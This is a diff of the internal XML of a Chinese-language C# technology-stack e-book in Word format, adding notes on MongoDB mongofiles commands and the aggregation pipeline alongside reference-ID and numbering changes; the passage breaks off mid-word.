+        </w:rPr>
+        <w:t>&lt;database&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> put </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>&lt;filename&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>删除文件：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">mongofiles </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">d </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>&lt;database&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> delete </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>&lt;filename&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>获取文件：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">mongofiles </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>d &lt;database&gt; -l &lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>new_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>filename&gt; get &lt;filename&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>常用的命令还有：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>--host &lt;hostname&gt;&lt;:port&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>--port &lt;port&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16833,6 +17331,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Web Services Description Language</w:t>
       </w:r>
       <w:r>
@@ -17533,7 +18032,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>微服务</w:t>
       </w:r>
     </w:p>
@@ -18240,6 +18738,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>结构型</w:t>
       </w:r>
     </w:p>
@@ -18797,7 +19296,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5270500" cy="2172335"/>
@@ -18816,7 +19314,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14" cstate="print"/>
+                    <a:blip r:embed="rId15" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -19333,7 +19831,18 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>的区别是：</w:t>
+        <w:t>的区别</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>是：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19816,7 +20325,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>所以缓存</w:t>
       </w:r>
       <w:r>
@@ -20152,7 +20660,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15" cstate="print"/>
+                    <a:blip r:embed="rId16" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -20204,7 +20712,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId16" w:anchor="undefined" w:history="1">
+      <w:hyperlink r:id="rId17" w:anchor="undefined" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -20223,7 +20731,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId17" w:history="1">
+      <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -20242,7 +20750,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId18" w:history="1">
+      <w:hyperlink r:id="rId19" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -20757,7 +21265,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>3</w:t>
       </w:r>
       <w:r>
@@ -21042,7 +21549,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId19" w:history="1">
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -21067,7 +21574,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -21500,7 +22007,7 @@
           <w:szCs w:val="44"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId21" w:history="1">
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -21803,7 +22310,6 @@
           <w:szCs w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>参考网址：</w:t>
       </w:r>
     </w:p>
@@ -21822,7 +22328,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId22" w:history="1">
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -21929,7 +22435,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23" cstate="print"/>
+                    <a:blip r:embed="rId24" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -22003,7 +22509,17 @@
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>尽管可以使用Application.Lock()避免了冲突，但是它串行化了对Application的请求，会产生严重的性能瓶颈</w:t>
+        <w:t>尽管可以使用Application.Lock()避免了冲突，但是它串行化了对Application的请求，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>会产生严重的性能瓶颈</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22048,7 +22564,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId24" w:history="1">
+      <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -22073,7 +22589,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId25" w:history="1">
+      <w:hyperlink r:id="rId26" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -22892,6 +23408,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Prism - Brian Lagunas</w:t>
       </w:r>
       <w:r>
@@ -23318,7 +23835,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>平台</w:t>
       </w:r>
     </w:p>
@@ -24193,6 +24709,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>OWIN Layer(</w:t>
       </w:r>
       <w:r>
@@ -24513,7 +25030,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Microsoft.Owin.Host.HttpListener</w:t>
       </w:r>
     </w:p>
@@ -25635,7 +26151,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26" cstate="print"/>
+                    <a:blip r:embed="rId27" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -25702,7 +26218,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27" cstate="print"/>
+                    <a:blip r:embed="rId28" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -34885,7 +35401,7 @@
         </w:rPr>
         <w:t>3.帕斯卡(</w:t>
       </w:r>
-      <w:hyperlink r:id="rId28" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
+      <w:hyperlink r:id="rId29" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -38906,7 +39422,7 @@
         </w:rPr>
         <w:t>，网址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId29" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
+      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -40490,7 +41006,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId30" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId31" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -40706,7 +41222,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId31" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId32" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41451,7 +41967,7 @@
         </w:rPr>
         <w:t>好了，访问</w:t>
       </w:r>
-      <w:hyperlink r:id="rId32" w:history="1">
+      <w:hyperlink r:id="rId33" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -48757,6 +49273,96 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="48">
+    <w:nsid w:val="7BAD69E7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F4727B6E"/>
+    <w:lvl w:ilvl="0" w:tplc="13947730">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:color w:val="0070C0"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="49">
     <w:nsid w:val="7BC4531B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="E1B210EE"/>
@@ -48905,7 +49511,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="49">
+  <w:abstractNum w:abstractNumId="50">
     <w:nsid w:val="7E1D9B84"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7E1D9B84"/>
@@ -49054,7 +49660,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="50">
+  <w:abstractNum w:abstractNumId="51">
     <w:nsid w:val="7FFE1E02"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7FFE1E02"/>
@@ -49228,7 +49834,7 @@
     <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="49"/>
+    <w:abstractNumId w:val="50"/>
   </w:num>
   <w:num w:numId="10">
     <w:abstractNumId w:val="7"/>
@@ -50224,7 +50830,7 @@
     <w:abstractNumId w:val="35"/>
   </w:num>
   <w:num w:numId="53">
-    <w:abstractNumId w:val="50"/>
+    <w:abstractNumId w:val="51"/>
   </w:num>
   <w:num w:numId="54">
     <w:abstractNumId w:val="4"/>
@@ -52921,10 +53527,13 @@
     <w:abstractNumId w:val="41"/>
   </w:num>
   <w:num w:numId="169">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
   </w:num>
   <w:num w:numId="170">
     <w:abstractNumId w:val="45"/>
+  </w:num>
+  <w:num w:numId="171">
+    <w:abstractNumId w:val="48"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="165"/>
 </w:numbering>
@@ -53741,7 +54350,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9C20B64E-E723-40C5-9EC1-8D22D43808EC}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0EFFC35D-7A10-46FA-8364-EA350509D9F0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -16706,9 +16706,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16726,16 +16723,12 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
           <w:b/>
           <w:sz w:val="24"/>
         </w:rPr>
@@ -16752,9 +16745,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16796,9 +16786,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16822,9 +16809,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16866,9 +16850,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16904,9 +16885,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16942,9 +16920,6 @@
           <w:numId w:val="171"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16975,9 +16950,6 @@
           <w:numId w:val="171"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17002,9 +16974,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17016,9 +16985,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
@@ -17032,17 +16998,11 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17054,9 +17014,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17101,9 +17058,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17148,9 +17102,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17189,9 +17140,11 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17203,9 +17156,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17217,15 +17167,954 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>--port &lt;port&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>聚合操作</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MongoDB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中有一个聚合工具：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Aggregate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，类似于</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>语句中的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Group By</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。聚合工具可以让开发人员直接使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MongoDB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的原生的命令操作数据库中的数据，并按要求进行聚合，聚合大幅提高了开发效率。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Aggregate PipeLine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>指的是命令将会按照顺序依次执行，并且管道操作可以重复，它的工作原理如图所示：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="3799205"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="7" name="图片 6" descr="6bf3ddafgw1f02gpxkzbcj20l40f7wgs.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="6bf3ddafgw1f02gpxkzbcj20l40f7wgs.jpg"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="3799205"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ggreagte</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
